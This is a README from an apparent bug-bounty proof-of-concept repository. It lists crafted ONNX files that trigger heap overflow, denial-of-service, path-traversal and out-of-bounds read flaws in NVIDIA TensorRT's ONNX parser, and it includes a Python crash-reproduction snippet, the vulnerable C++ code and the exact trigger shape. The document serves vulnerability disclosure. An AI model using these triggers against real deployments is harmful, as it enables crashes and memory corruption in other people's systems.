tensorrt-cve-poc / README.md
ijustabi's picture
Upload README.md with huggingface_hub
cd023ae verified
|
Raw
History Blame Contribute Delete
1.85 kB
---
tags:
- security
- proof-of-concept
license: apache-2.0
---
# TensorRT ONNX Parser - Security PoC Models
Bug bounty research submission to huntr.com targeting NVIDIA TensorRT ONNX parser.
## Vulnerabilities
| File | Vulnerability | CWE | Severity |
|------|--------------|-----|----------|
| `eyelike_overflow.onnx` | Integer overflow -> heap OOB write in EyeLike op | CWE-190, CWE-122 | Critical |
| `eyelike_small_overflow.onnx` | Same bug, faster crash trigger | CWE-190, CWE-122 | Critical |
| `external_oom_length.onnx` | Uncapped length field -> OOM denial of service | CWE-770 | High |
| `external_abs_path.onnx` | Absolute path traversal bypass in external weights | CWE-22 | Medium |
| `external_neg_offset.onnx` | Negative seek offset in external weights | CWE-20 | Medium |
| `external_oob_offset.onnx` | Read past EOF - uninitialized buffer risk | CWE-125 | Medium |
## Reproduce (Finding 1 - Heap OOB Write)
```python
import tensorrt as trt
logger = trt.Logger(trt.Logger.VERBOSE)
builder = trt.Builder(logger)
network = builder.create_network(
1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
parser = trt.OnnxParser(network, logger)
with open("eyelike_overflow.onnx", "rb") as f:
parser.parse(f.read())
# Expected: SIGSEGV / heap-buffer-overflow
```
## Root Cause (Finding 1)
```cpp
// onnxOpImporters.cpp - EyeLike importer
int totalWeights = dims.d[0] * dims.d[1]; // int32 overflow! dims are int64_t
std::vector<int> values(totalWeights); // undersized allocation
for (int32_t r = 0; r < dims.d[0]; ++r)
for (int32_t c = 0; c < dims.d[1]; ++c)
values[r * dims.d[1] + c] = 0; // OOB WRITE
```
Trigger: input shape `[65537, 65536]`
- True product: 4,295,032,832 (overflows int32)
- int32 truncated: 65,536 (vector too small)
- First OOB write: r=1, c=0 -> index 65,536